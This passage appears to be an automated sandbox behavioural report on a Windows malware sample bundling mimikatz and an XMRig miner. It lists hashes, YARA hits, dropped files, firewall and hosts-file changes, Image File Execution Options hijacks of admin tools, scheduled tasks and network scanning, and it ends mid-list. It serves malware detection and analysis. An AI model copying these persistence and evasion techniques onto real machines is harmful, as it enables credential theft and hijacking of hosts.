Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
151s -
max time network
158s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
07/05/2024, 05:27
Behavioral task
behavioral1
Sample
2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe
-
Size
7.8MB
-
MD5
59cd884d3b145f770bf5c689fd90025f
-
SHA1
1334c015b3dfedc9dac1a4d5020f9314476f5f39
-
SHA256
6ea8970a7fc929a9d258c028258a3aaadc121f4588f053cbc5a380ca91b67124
-
SHA512
f98384f5fc9bedaf59b066c5bc8768257587b7201818cc0a16ebb5f2f884a96ae0eda13894d06e7041528b2180b96b22a43328e80d4c24f468dec3d8f47d46b3
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1356 created 1736 1356 guwlsyl.exe 38 -
Contacts a large (18328) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs
resource yara_rule behavioral2/memory/3132-137-0x00007FF6D13F0000-0x00007FF6D14DE000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 38 IoCs
resource yara_rule behavioral2/memory/4924-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/4924-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x0008000000023249-6.dat UPX behavioral2/memory/3248-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x00070000000232a3-134.dat UPX behavioral2/memory/3132-135-0x00007FF6D13F0000-0x00007FF6D14DE000-memory.dmp UPX behavioral2/memory/3132-137-0x00007FF6D13F0000-0x00007FF6D14DE000-memory.dmp UPX behavioral2/files/0x00070000000232ad-140.dat UPX behavioral2/memory/3992-141-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/files/0x00070000000232ac-144.dat UPX behavioral2/memory/2960-145-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/3992-151-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/4432-170-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2960-172-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/2960-175-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/2936-176-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/1956-185-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2960-188-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/1728-190-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/3960-194-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2020-198-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2960-200-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/420-203-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/1940-207-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2960-209-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/4532-212-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2960-228-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/3772-231-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/6460-236-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2960-238-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/6668-241-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/6192-244-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2960-245-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/7152-247-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/6212-291-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/2960-298-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp UPX behavioral2/memory/4884-303-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX behavioral2/memory/876-305-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp UPX -
XMRig Miner payload 9 IoCs
resource yara_rule behavioral2/memory/2960-172-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig behavioral2/memory/2960-175-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig behavioral2/memory/2960-188-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig behavioral2/memory/2960-200-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig behavioral2/memory/2960-209-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig behavioral2/memory/2960-228-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig behavioral2/memory/2960-238-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig behavioral2/memory/2960-245-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig behavioral2/memory/2960-298-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4924-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4924-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023249-6.dat mimikatz behavioral2/memory/3248-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/3132-137-0x00007FF6D13F0000-0x00007FF6D14DE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts guwlsyl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts guwlsyl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1336 netsh.exe 1144 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" guwlsyl.exe -
Executes dropped EXE 29 IoCs
pid Process 3248 guwlsyl.exe 1356 guwlsyl.exe 3456 wpcap.exe 2052 betzilvlu.exe 3132 vfshost.exe 3992 ntaiaautl.exe 2960 ibyaef.exe 4432 ntaiaautl.exe 4012 xohudmc.exe 2248 tyxtye.exe 2936 ntaiaautl.exe 1956 ntaiaautl.exe 3772 guwlsyl.exe 1728 ntaiaautl.exe 3960 ntaiaautl.exe 2020 ntaiaautl.exe 420 ntaiaautl.exe 1940 ntaiaautl.exe 4532 ntaiaautl.exe 3772 ntaiaautl.exe 688 itfnybsmt.exe 6460 ntaiaautl.exe 6668 ntaiaautl.exe 6192 ntaiaautl.exe 7152 ntaiaautl.exe 2804 guwlsyl.exe 6212 ntaiaautl.exe 4884 ntaiaautl.exe 876 ntaiaautl.exe -
Loads dropped DLL 12 IoCs
pid Process 3456 wpcap.exe 3456 wpcap.exe 3456 wpcap.exe 3456 wpcap.exe 3456 wpcap.exe 3456 wpcap.exe 3456 wpcap.exe 3456 wpcap.exe 3456 wpcap.exe 2052 betzilvlu.exe 2052 betzilvlu.exe 2052 betzilvlu.exe -
resource yara_rule behavioral2/files/0x00070000000232a3-134.dat upx behavioral2/memory/3132-135-0x00007FF6D13F0000-0x00007FF6D14DE000-memory.dmp upx behavioral2/memory/3132-137-0x00007FF6D13F0000-0x00007FF6D14DE000-memory.dmp upx behavioral2/files/0x00070000000232ad-140.dat upx behavioral2/memory/3992-141-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/files/0x00070000000232ac-144.dat upx behavioral2/memory/2960-145-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/3992-151-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/4432-170-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2960-172-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/2960-175-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/2936-176-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/1956-185-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2960-188-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/1728-190-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/3960-194-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2020-198-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2960-200-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/420-203-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/1940-207-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2960-209-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/4532-212-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2960-228-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/3772-231-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/6460-236-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2960-238-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/6668-241-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/6192-244-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2960-245-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/7152-247-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/6212-291-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/2960-298-0x00007FF72DD30000-0x00007FF72DE50000-memory.dmp upx behavioral2/memory/4884-303-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx behavioral2/memory/876-305-0x00007FF696A10000-0x00007FF696A6B000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 87 ifconfig.me 88 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 guwlsyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 guwlsyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE guwlsyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies guwlsyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft guwlsyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache guwlsyl.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\tyxtye.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 guwlsyl.exe File created C:\Windows\SysWOW64\tyxtye.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 guwlsyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content guwlsyl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 guwlsyl.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData guwlsyl.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\lbtermtbs\UnattendGC\specials\crli-0.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\schoedcl.xml guwlsyl.exe File created C:\Windows\jetgmbly\svschost.xml guwlsyl.exe File created C:\Windows\lbtermtbs\etamgyklt\wpcap.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\exma-1.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\cnli-1.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\docmicfg.exe guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\vimpcsvc.xml guwlsyl.exe File created C:\Windows\lbtermtbs\Corporate\mimilib.dll guwlsyl.exe File created C:\Windows\lbtermtbs\upbdrjv\swrpwe.exe guwlsyl.exe File created C:\Windows\lbtermtbs\etamgyklt\wpcap.exe guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\trch-1.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\vimpcsvc.exe guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\svschost.xml guwlsyl.exe File created C:\Windows\jetgmbly\vimpcsvc.xml guwlsyl.exe File opened for modification C:\Windows\jetgmbly\schoedcl.xml guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\libxml2.dll guwlsyl.exe File created C:\Windows\jetgmbly\spoolsrv.xml guwlsyl.exe File opened for modification C:\Windows\jetgmbly\spoolsrv.xml guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\AppCapture64.dll guwlsyl.exe File opened for modification C:\Windows\lbtermtbs\Corporate\log.txt cmd.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\zlib1.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\trfo-2.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\spoolsrv.exe guwlsyl.exe File created C:\Windows\lbtermtbs\Corporate\vfshost.exe guwlsyl.exe File created C:\Windows\lbtermtbs\etamgyklt\scan.bat guwlsyl.exe File opened for modification C:\Windows\lbtermtbs\etamgyklt\Result.txt itfnybsmt.exe File created C:\Windows\lbtermtbs\etamgyklt\itfnybsmt.exe guwlsyl.exe File opened for modification C:\Windows\jetgmbly\vimpcsvc.xml guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\ucl.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\tucl-1.dll guwlsyl.exe File created C:\Windows\lbtermtbs\etamgyklt\betzilvlu.exe guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\xdvl-0.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\schoedcl.xml guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\AppCapture32.dll guwlsyl.exe File created C:\Windows\jetgmbly\guwlsyl.exe 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe File created C:\Windows\jetgmbly\docmicfg.xml guwlsyl.exe File created C:\Windows\lbtermtbs\Corporate\mimidrv.sys guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\coli-0.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\vimpcsvc.xml guwlsyl.exe File opened for modification C:\Windows\jetgmbly\svschost.xml guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\svschost.exe guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\spoolsrv.xml guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\spoolsrv.xml guwlsyl.exe File opened for modification C:\Windows\lbtermtbs\etamgyklt\Packet.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\posh-0.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\tibe-2.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\docmicfg.xml guwlsyl.exe File created C:\Windows\jetgmbly\schoedcl.xml guwlsyl.exe File opened for modification C:\Windows\jetgmbly\guwlsyl.exe 2024-05-07_59cd884d3b145f770bf5c689fd90025f_hacktools_icedid_mimikatz.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\ssleay32.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\libeay32.dll guwlsyl.exe File created C:\Windows\lbtermtbs\etamgyklt\ip.txt guwlsyl.exe File created C:\Windows\lbtermtbs\etamgyklt\Packet.dll guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\svschost.xml guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\docmicfg.xml guwlsyl.exe File opened for modification C:\Windows\jetgmbly\docmicfg.xml guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\Shellcode.ini guwlsyl.exe File created C:\Windows\ime\guwlsyl.exe guwlsyl.exe File created C:\Windows\lbtermtbs\UnattendGC\specials\schoedcl.exe guwlsyl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2700 sc.exe 4044 sc.exe 4196 sc.exe 3132 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023249-6.dat nsis_installer_2 behavioral2/files/0x0008000000023264-15.dat nsis_installer_1 behavioral2/files/0x0008000000023264-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4996 schtasks.exe 1168 schtasks.exe 4924 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ guwlsyl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" guwlsyl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" guwlsyl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" ntaiaautl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump ntaiaautl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" 